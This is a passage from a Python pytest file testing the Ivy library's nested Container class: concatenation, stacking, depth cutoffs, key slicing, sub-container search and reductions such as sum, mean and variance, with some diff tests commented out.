assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[1]), np.array([6]))
def test_container_unify(dev, call):
# devices and containers
devs = list()
dev0 = dev
devs.append(dev0)
conts = dict()
conts[dev0] = Container(
{'a': ivy.array([1], dev=dev0),
'b': {'c': ivy.array([2], dev=dev0), 'd': ivy.array([3], dev=dev0)}})
if 'gpu' in dev and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = dev[:-1] + str(idx)
devs.append(dev1)
conts[dev1] = Container(
{'a': ivy.array([4], dev=dev1),
'b': {'c': ivy.array([5], dev=dev1), 'd': ivy.array([6], dev=dev1)}})
# test
container_unified = ivy.Container.unify(ivy.MultiDevItem(conts), dev0, 'concat', 0)
assert np.allclose(ivy.to_numpy(container_unified.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[0]), np.array([3]))
if len(devs) > 1:
assert np.allclose(ivy.to_numpy(container_unified.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[1]), np.array([6]))
def test_container_concat(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_concatenated = ivy.Container.concat([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_concatenated['a']), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated.a), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated['b']['c']), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.c), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated['b']['d']), np.array([3, 6]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.d), np.array([3, 6]))
def test_container_stack(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_stacked = ivy.Container.stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_stacked['a']), np.array([[1], [4]]))
assert np.allclose(ivy.to_numpy(container_stacked.a), np.array([[1], [4]]))
assert np.allclose(ivy.to_numpy(container_stacked['b']['c']), np.array([[2], [5]]))
assert np.allclose(ivy.to_numpy(container_stacked.b.c), np.array([[2], [5]]))
assert np.allclose(ivy.to_numpy(container_stacked['b']['d']), np.array([[3], [6]]))
assert np.allclose(ivy.to_numpy(container_stacked.b.d), np.array([[3], [6]]))
def test_container_combine(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'e': ivy.array([6], dev=dev)}})
container_comb = ivy.Container.combine(container_0, container_1)
assert np.equal(ivy.to_numpy(container_comb.a), np.array([4]))
assert np.equal(ivy.to_numpy(container_comb.b.c), np.array([5]))
assert np.equal(ivy.to_numpy(container_comb.b.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_comb.b.e), np.array([6]))
# def test_container_diff(dev, call):
# # all different arrays
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([4]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_1), np.array([6]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different arrays
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' in container_diff_diff_only['b']
# assert 'd' not in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' not in container_diff_same_only['b']
# assert 'd' in container_diff_same_only['b']
#
# # all different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'e': ivy.array([1], dev=dev),
# 'f': {'g': ivy.array([2], dev=dev), 'h': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'e': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' not in container_diff_diff_only['b']
# assert 'd' in container_diff_diff_only['b']
# assert 'e' in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' in container_diff_same_only['b']
# assert 'd' not in container_diff_same_only['b']
# assert 'e' not in container_diff_same_only['b']
#
# # same containers
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == {}
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == container_diff.to_dict()
#
# # all different strings
# container_0 = Container({'a': '1',
# 'b': {'c': '2', 'd': '3'}})
# container_1 = Container({'a': '4',
# 'b': {'c': '5', 'd': '6'}})
# container_diff = ivy.Container.diff(container_0, container_1)
# assert container_diff.a.diff_0 == '1'
# assert container_diff.a.diff_1 == '4'
# assert container_diff.b.c.diff_0 == '2'
# assert container_diff.b.c.diff_1 == '5'
# assert container_diff.b.d.diff_0 == '3'
# assert container_diff.b.d.diff_1 == '6'
# container_diff_diff_only = ivy.Container.diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
# def test_container_structural_diff(dev, call):
# # all different keys or shapes
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([[4]], dev=dev),
# 'b': {'c': ivy.array([[[5]]], dev=dev), 'e': ivy.array([3], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([[4]]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([[[5]]]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different shapes
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([[5]], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' in container_diff_diff_only['b']
# assert 'd' not in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' not in container_diff_same_only['b']
# assert 'd' in container_diff_same_only['b']
#
# # all different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'e': ivy.array([4], dev=dev),
# 'f': {'g': ivy.array([5], dev=dev), 'h': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([4]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([5]))
# assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([6]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == container_diff.to_dict()
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == {}
#
# # some different keys
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'e': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
# assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([6]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert 'a' not in container_diff_diff_only
# assert 'b' in container_diff_diff_only
# assert 'c' not in container_diff_diff_only['b']
# assert 'd' in container_diff_diff_only['b']
# assert 'e' in container_diff_diff_only['b']
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert 'a' in container_diff_same_only
# assert 'b' in container_diff_same_only
# assert 'c' in container_diff_same_only['b']
# assert 'd' not in container_diff_same_only['b']
# assert 'e' not in container_diff_same_only['b']
#
# # all same
# container_0 = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_1 = Container({'a': ivy.array([4], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container_diff = ivy.Container.structural_diff(container_0, container_1)
# assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
# assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
# assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
# container_diff_diff_only = ivy.Container.structural_diff(container_0, container_1, mode='diff_only')
# assert container_diff_diff_only.to_dict() == {}
# container_diff_same_only = ivy.Container.structural_diff(container_0, container_1, mode='same_only')
# assert container_diff_same_only.to_dict() == container_diff.to_dict()
def test_container_from_dict(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_depth(dev, call):
cont_depth1 = Container({'a': ivy.array([1], dev=dev),
'b': ivy.array([2], dev=dev)})
assert cont_depth1.max_depth == 1
cont_depth2 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
assert cont_depth2.max_depth == 2
cont_depth3 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': {'d': ivy.array([2], dev=dev)}, 'e': ivy.array([3], dev=dev)}})
assert cont_depth3.max_depth == 3
cont_depth4 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': {'d': {'e': ivy.array([2], dev=dev)}}}})
assert cont_depth4.max_depth == 4
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_cutoff_at_depth(inplace, dev, call):
# values
a_val = ivy.array([1], dev=dev)
bcde_val = ivy.array([2], dev=dev)
# depth 1
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b
# depth 2
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c
# depth 3
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c.d
# depth 4
cont = Container({'a': a_val, 'b': {'c': {'d': {'e': bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(bcde_val))
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_cutoff_at_height(inplace, dev, call):
# values
d_val = ivy.array([2], dev=dev)
e_val = ivy.array([3], dev=dev)
# height 0
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(0, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a.c.d), ivy.to_numpy(d_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(e_val))
# height 1
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a.c
assert not cont_cutoff.b.c.d
# height 2
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b.c
# height 3
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b
# height 4
cont = Container({'a': {'c': {'d': d_val}}, 'b': {'c': {'d': {'e': e_val}}}})
cont_cutoff = cont.cutoff_at_height(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff
@pytest.mark.parametrize(
"str_slice", [True, False])
def test_container_slice_keys(str_slice, dev, call):
# values
a_val = ivy.array([1], dev=dev)
b_val = ivy.array([2], dev=dev)
c_val = ivy.array([3], dev=dev)
d_val = ivy.array([4], dev=dev)
e_val = ivy.array([5], dev=dev)
# slice
if str_slice:
slc = 'b:d'
else:
slc = slice(1, 4, 1)
# without dict
cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
cont_sliced = cont.slice_keys(slc)
assert 'a' not in cont_sliced
assert np.allclose(ivy.to_numpy(cont_sliced.b), ivy.to_numpy(b_val))
assert np.allclose(ivy.to_numpy(cont_sliced.c), ivy.to_numpy(c_val))
assert np.allclose(ivy.to_numpy(cont_sliced.d), ivy.to_numpy(d_val))
assert 'e' not in cont_sliced
# with dict, depth 0
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys({0: slc})
assert 'a' not in cont_sliced
assert Container.identical([cont_sliced.b, sub_cont])
assert Container.identical([cont_sliced.c, sub_cont])
assert Container.identical([cont_sliced.d, sub_cont])
assert 'e' not in cont_sliced
# with dict, depth 1
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
sub_sub_cont = Container({'b': b_val, 'c': c_val, 'd': d_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys({1: slc})
assert Container.identical([cont_sliced.a, sub_sub_cont])
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert Container.identical([cont_sliced.e, sub_sub_cont])
# with dict, depth 0, 1
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
sub_sub_cont = Container({'b': b_val, 'c': c_val, 'd': d_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys({0: slc, 1: slc})
assert 'a' not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert 'e' not in cont_sliced
# all depths
sub_cont = Container({'a': a_val, 'b': b_val, 'c': c_val, 'd': d_val, 'e': e_val})
sub_sub_cont = Container({'b': b_val, 'c': c_val, 'd': d_val})
cont = Container({'a': sub_cont, 'b': sub_cont, 'c': sub_cont, 'd': sub_cont, 'e': sub_cont})
cont_sliced = cont.slice_keys(slc, all_depths=True)
assert 'a' not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert 'e' not in cont_sliced
def test_container_show(dev, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
cont = Container(dict_in)
print(cont)
cont.show()
def test_container_find_sub_container(dev, call):
arr1 = ivy.array([1], dev=dev)
arr2 = ivy.array([2], dev=dev)
arr3 = ivy.array([3], dev=dev)
dict_in = {'a': arr1, 'b': {'c': arr2, 'd': arr3}}
top_cont = Container(dict_in)
# full
sub_cont = Container(dict_in['b'])
assert sub_cont in top_cont
found_kc = top_cont.find_sub_container(sub_cont)
assert found_kc == 'b'
found_kc = top_cont.find_sub_container(top_cont)
assert found_kc == ''
# partial
partial_sub_cont = Container({'d': arr3})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == 'b'
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
partial_sub_cont = Container({'b': {'d': arr3}})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == ''
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
def test_container_find_sub_structure(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
top_cont = Container(dict_in)
# full
sub_cont = Container({'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)})
assert not top_cont.find_sub_container(sub_cont)
found_kc = top_cont.find_sub_structure(sub_cont)
assert found_kc == 'b'
found_kc = top_cont.find_sub_structure(top_cont)
assert found_kc == ''
# partial
partial_sub_cont = Container({'d': ivy.array([5], dev=dev)})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == 'b'
partial_sub_cont = Container({'b': {'d': ivy.array([5], dev=dev)}})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == ''
def test_container_show_sub_container(dev, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
top_cont = Container(dict_in)
sub_cont = Container(dict_in['b'])
top_cont.show_sub_container('b')
top_cont.show_sub_container(sub_cont)
def test_container_from_dict_w_cont_types(dev, call):
# ToDo: add tests for backends other than jax
if call is not helpers.jnp_call:
pytest.skip()
from haiku._src.data_structures import FlatMapping
dict_in = {'a': ivy.array([1], dev=dev),
'b': FlatMapping({'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)})}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_kwargs(dev, call):
container = Container(a=ivy.array([1], dev=dev),
b={'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)})
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_list(dev, call):
list_in = [ivy.array([1], dev=dev),
[ivy.array([2], dev=dev), ivy.array([3], dev=dev)]]
container = Container(list_in, types_to_iteratively_nest=[list])
assert np.allclose(ivy.to_numpy(container['it_0']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_0']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_1']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_from_tuple(dev, call):
tuple_in = (ivy.array([1], dev=dev),
(ivy.array([2], dev=dev), ivy.array([3], dev=dev)))
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
assert np.allclose(ivy.to_numpy(container['it_0']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_0']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container['it_1']['it_1']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_to_raw(dev, call):
tuple_in = (ivy.array([1], dev=dev),
(ivy.array([2], dev=dev), ivy.array([3], dev=dev)))
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
raw = container.to_raw()
assert np.allclose(ivy.to_numpy(raw[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(raw[1][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(raw[1][1]), np.array([3]))
def test_container_sum(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_sum = container.sum()
assert np.allclose(ivy.to_numpy(container_sum['a']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_sum.a), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_sum['b']['c']), np.array([12.]))
assert np.allclose(ivy.to_numpy(container_sum.b.c), np.array([12.]))
assert np.allclose(ivy.to_numpy(container_sum['b']['d']), np.array([18.]))
assert np.allclose(ivy.to_numpy(container_sum.b.d), np.array([18.]))
def test_container_prod(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_prod = container.prod()
assert np.allclose(ivy.to_numpy(container_prod['a']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_prod.a), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_prod['b']['c']), np.array([48.]))
assert np.allclose(ivy.to_numpy(container_prod.b.c), np.array([48.]))
assert np.allclose(ivy.to_numpy(container_prod['b']['d']), np.array([162.]))
assert np.allclose(ivy.to_numpy(container_prod.b.d), np.array([162.]))
def test_container_mean(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_mean = container.mean()
assert np.allclose(ivy.to_numpy(container_mean['a']), np.array([2.]))
assert np.allclose(ivy.to_numpy(container_mean.a), np.array([2.]))
assert np.allclose(ivy.to_numpy(container_mean['b']['c']), np.array([4.]))
assert np.allclose(ivy.to_numpy(container_mean.b.c), np.array([4.]))
assert np.allclose(ivy.to_numpy(container_mean['b']['d']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_mean.b.d), np.array([6.]))
def test_container_var(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_var = container.var()
assert np.allclose(ivy.to_numpy(container_var['a']), np.array([2 / 3]))
assert np.allclose(ivy.to_numpy(container_var.a), np.array([2 / 3]))
